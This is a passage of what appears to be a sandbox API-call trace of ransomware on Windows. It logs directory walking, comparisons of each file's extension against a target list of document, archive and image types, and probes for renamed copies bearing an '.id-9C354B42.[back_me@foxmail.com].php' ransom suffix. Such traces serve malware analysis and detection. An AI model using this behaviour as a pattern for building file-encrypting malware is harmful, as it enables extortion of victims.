dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.622] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.622] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.622] lstrlenW (lpString=".doc") returned 4 [0241.622] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.622] lstrlenW (lpString=".docx") returned 5 [0241.622] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.622] lstrlenW (lpString=".pdf") returned 4 [0241.622] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.622] lstrlenW (lpString=".xls") returned 4 [0241.622] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.622] lstrlenW (lpString=".xlsx") returned 5 [0241.623] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.623] lstrlenW (lpString=".ppt") returned 4 [0241.623] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.623] lstrlenW (lpString=".zip") returned 4 [0241.623] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.623] lstrlenW (lpString=".rar") returned 4 [0241.623] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.623] lstrlenW (lpString=".bz2") returned 4 [0241.623] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.623] lstrlenW (lpString=".7z") returned 3 [0241.623] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.623] lstrlenW (lpString=".dbf") returned 4 [0241.623] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.623] lstrlenW (lpString=".1cd") returned 4 [0241.623] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.623] lstrlenW (lpString=".jpg") returned 4 [0241.623] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.623] lstrlenW (lpString=".doc") returned 4 [0241.623] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.623] lstrlenW (lpString=".docx") returned 5 [0241.623] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.623] lstrlenW (lpString=".pdf") returned 4 [0241.623] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.623] lstrlenW (lpString=".xls") returned 4 [0241.623] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.624] lstrlenW (lpString=".xlsx") returned 5 [0241.624] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.624] lstrlenW (lpString=".ppt") returned 4 [0241.624] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.624] lstrlenW (lpString=".zip") returned 4 [0241.624] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.624] lstrlenW (lpString=".rar") returned 4 [0241.624] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.624] lstrlenW (lpString=".bz2") returned 4 [0241.624] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.624] lstrlenW (lpString=".7z") returned 3 [0241.624] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.624] lstrlenW (lpString=".dbf") returned 4 [0241.624] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.624] lstrlenW (lpString=".1cd") returned 4 [0241.624] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0241.624] lstrlenW (lpString=".jpg") returned 4 [0241.624] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.624] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.624] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.624] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.625] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=90704) returned 1 [0241.625] CloseHandle (hObject=0x244) returned 1 [0241.625] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0241.625] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.625] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.625] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.625] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.625] lstrlenW (lpString=".doc") returned 4 [0241.625] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.625] lstrlenW (lpString=".docx") returned 5 [0241.625] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.625] lstrlenW (lpString=".pdf") returned 4 [0241.625] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.625] lstrlenW (lpString=".xls") returned 4 [0241.625] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.625] lstrlenW (lpString=".xlsx") returned 5 [0241.625] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.625] lstrlenW (lpString=".ppt") returned 4 [0241.625] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.625] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.625] lstrlenW (lpString=".zip") returned 4 [0241.625] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.625] lstrlenW (lpString=".rar") returned 4 [0241.625] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.625] lstrlenW (lpString=".bz2") returned 4 [0241.625] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.625] lstrlenW (lpString=".7z") returned 3 [0241.625] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.625] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.625] lstrlenW (lpString=".dbf") returned 4 [0241.626] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.626] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.626] lstrlenW (lpString=".1cd") returned 4 [0241.626] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.626] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.626] lstrlenW (lpString=".jpg") returned 4 [0241.626] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.626] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.626] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.626] lstrlenW (lpString=".doc") returned 4 [0241.626] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.626] lstrlenW (lpString=".docx") returned 5 [0241.626] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.626] lstrlenW (lpString=".pdf") returned 4 [0241.626] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.626] lstrlenW (lpString=".xls") returned 4 [0241.626] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.626] lstrlenW (lpString=".xlsx") returned 5 [0241.626] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.626] lstrlenW (lpString=".ppt") returned 4 [0241.626] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.626] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.626] lstrlenW (lpString=".zip") returned 4 [0241.626] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.626] lstrlenW (lpString=".rar") returned 4 [0241.626] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.626] lstrlenW (lpString=".bz2") returned 4 [0241.626] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.626] lstrlenW (lpString=".7z") returned 3 [0241.626] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.627] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.627] lstrlenW (lpString=".dbf") returned 4 [0241.627] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.627] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.627] lstrlenW (lpString=".1cd") returned 4 [0241.627] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.627] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0241.627] lstrlenW (lpString=".jpg") returned 4 [0241.627] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.627] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.627] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.627] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.627] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=76352) returned 1 [0241.627] CloseHandle (hObject=0x244) returned 1 [0241.627] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0241.627] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.627] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.627] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.627] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.627] lstrlenW (lpString=".doc") returned 4 [0241.627] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.628] lstrlenW (lpString=".docx") returned 5 [0241.628] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.628] lstrlenW (lpString=".pdf") returned 4 [0241.628] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.628] lstrlenW (lpString=".xls") returned 4 [0241.628] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.628] lstrlenW (lpString=".xlsx") returned 5 [0241.628] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.628] lstrlenW (lpString=".ppt") returned 4 [0241.628] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.628] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.628] lstrlenW (lpString=".zip") returned 4 [0241.628] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.628] lstrlenW (lpString=".rar") returned 4 [0241.628] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.628] lstrlenW (lpString=".bz2") returned 4 [0241.628] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.628] lstrlenW (lpString=".7z") returned 3 [0241.628] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.628] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.628] lstrlenW (lpString=".dbf") returned 4 [0241.628] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.628] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.628] lstrlenW (lpString=".1cd") returned 4 [0241.628] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.628] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.628] lstrlenW (lpString=".jpg") returned 4 [0241.628] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.628] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.628] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.628] lstrlenW (lpString=".doc") returned 4 [0241.629] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.629] lstrlenW (lpString=".docx") returned 5 [0241.629] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.629] lstrlenW (lpString=".pdf") returned 4 [0241.629] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.629] lstrlenW (lpString=".xls") returned 4 [0241.629] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.629] lstrlenW (lpString=".xlsx") returned 5 [0241.629] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.629] lstrlenW (lpString=".ppt") returned 4 [0241.629] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.629] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.629] lstrlenW (lpString=".zip") returned 4 [0241.629] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.629] lstrlenW (lpString=".rar") returned 4 [0241.629] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.629] lstrlenW (lpString=".bz2") returned 4 [0241.629] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.629] lstrlenW (lpString=".7z") returned 3 [0241.629] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.629] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.629] lstrlenW (lpString=".dbf") returned 4 [0241.629] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.629] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.629] lstrlenW (lpString=".1cd") returned 4 [0241.629] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.629] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0241.629] lstrlenW (lpString=".jpg") returned 4 [0241.629] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.630] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.630] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.630] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.630] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=75344) returned 1 [0241.630] CloseHandle (hObject=0x244) returned 1 [0241.630] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0241.630] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.630] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.630] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0241.630] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0241.630] lstrlenW (lpString=".doc") returned 4 [0241.630] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.630] lstrlenW (lpString=".docx") returned 5 [0241.630] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.630] lstrlenW (lpString=".pdf") returned 4 [0241.630] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.630] lstrlenW (lpString=".xls") returned 4 [0241.630] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.630] lstrlenW (lpString=".xlsx") returned 5 [0241.630] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.630] lstrlenW (lpString=".ppt") returned 4 [0241.630] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.630] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0241.631] lstrlenW (lpString=".zip") returned 4 [0241.631] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.631] lstrlenW (lpString=".rar") returned 4 [0241.631] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.631] lstrlenW (lpString=".bz2") returned 4 [0241.631] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.631] lstrlenW (lpString=".7z") returned 3 [0241.631] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 Thread: id = 61 os_tid = 0x63c [0241.370] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3da4178 [0241.370] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3db4180 [0241.370] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e1c8 [0241.370] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99c80 [0241.370] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e1e0 [0241.370] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x44b0020 [0241.371] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e1f8 [0241.371] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e1f8, Size=0x20) returned 0xbbdd88 [0241.371] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e1f8 [0241.371] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e1f8, Size=0x20) returned 0xbbddb0 [0241.371] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.371] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.371] Wow64DisableWow64FsRedirection (in: OldValue=0x392ff58 | out: OldValue=0x392ff58*=0x0) returned 1 [0241.371] lstrlenW (lpString="kernel32.dll") returned 12 [0241.371] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdd88 | out: hHeap=0xb00000) returned 1 [0241.371] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.371] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbddb0 | out: hHeap=0xb00000) returned 1 [0241.371] Sleep (dwMilliseconds=0x64) [0241.557] Sleep (dwMilliseconds=0x64) [0241.754] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.754] lstrlenW (lpString="boxed-split.avi") returned 15 [0241.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.869] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=62976) returned 1 [0241.869] CloseHandle (hObject=0x2b8) returned 1 [0241.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0241.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.869] lstrlenW (lpString=".doc") returned 4 [0241.869] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.869] lstrlenW (lpString=".docx") returned 5 [0241.869] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.869] lstrlenW (lpString=".pdf") returned 4 [0241.869] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.869] lstrlenW (lpString=".xls") returned 4 [0241.869] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.869] lstrlenW (lpString=".xlsx") returned 5 [0241.870] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.870] lstrlenW (lpString=".ppt") returned 4 [0241.870] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.870] lstrlenW (lpString=".zip") returned 4 [0241.870] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString=".rar") returned 4 [0241.870] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString=".bz2") returned 4 [0241.870] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString=".7z") returned 3 [0241.870] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.870] lstrlenW (lpString=".dbf") returned 4 [0241.870] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.870] lstrlenW (lpString=".1cd") returned 4 [0241.870] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.870] lstrlenW (lpString=".jpg") returned 4 [0241.870] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.870] lstrlenW (lpString=".doc") returned 4 [0241.870] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.870] lstrlenW (lpString=".docx") returned 5 [0241.870] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.870] lstrlenW (lpString=".pdf") returned 4 [0241.871] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString=".xls") returned 4 [0241.871] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString=".xlsx") returned 5 [0241.871] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.871] lstrlenW (lpString=".ppt") returned 4 [0241.871] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.871] lstrlenW (lpString=".zip") returned 4 [0241.871] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString=".rar") returned 4 [0241.871] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString=".bz2") returned 4 [0241.871] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString=".7z") returned 3 [0241.871] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.871] lstrlenW (lpString=".dbf") returned 4 [0241.871] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.871] lstrlenW (lpString=".1cd") returned 4 [0241.871] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0241.871] lstrlenW (lpString=".jpg") returned 4 [0241.871] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.872] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.872] lstrlenW (lpString="correct.avi") returned 11 [0241.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.872] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=197120) returned 1 [0241.872] CloseHandle (hObject=0x2b8) returned 1 [0241.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0241.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.872] CreateFileW (lpFileName="C:\\Program Files\\Common 